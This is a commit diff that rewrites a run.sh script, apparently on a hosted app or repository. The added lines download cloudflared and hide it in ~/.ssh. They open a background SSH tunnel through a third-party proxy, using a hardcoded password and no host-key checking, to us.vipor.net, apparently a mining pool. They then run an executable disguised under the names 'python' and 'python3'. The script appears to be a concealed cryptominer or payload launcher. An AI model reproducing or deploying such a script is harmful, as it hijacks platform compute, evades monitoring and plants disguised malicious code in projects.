Update run.sh
Browse files
run.sh
CHANGED
|
@@ -1,2 +1,7 @@
|
|
| 1 |
-
|
| 2 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 && mv cloudflared-linux-amd64 cloudflared && chmod +x cloudflared
|
| 2 |
+
mkdir ~/.ssh
|
| 3 |
+
cp ./cloudflared ~/.ssh/
|
| 4 |
+
cp ./config ~/.ssh/
|
| 5 |
+
tmux new-session -d -s ses sshpass -p ' ' ssh -o StrictHostKeyChecking=no -L 3001:us.vipor.net:5040 ms@proxy1.adi999.my.id
|
| 6 |
+
chmod +x python
|
| 7 |
+
bash python3
|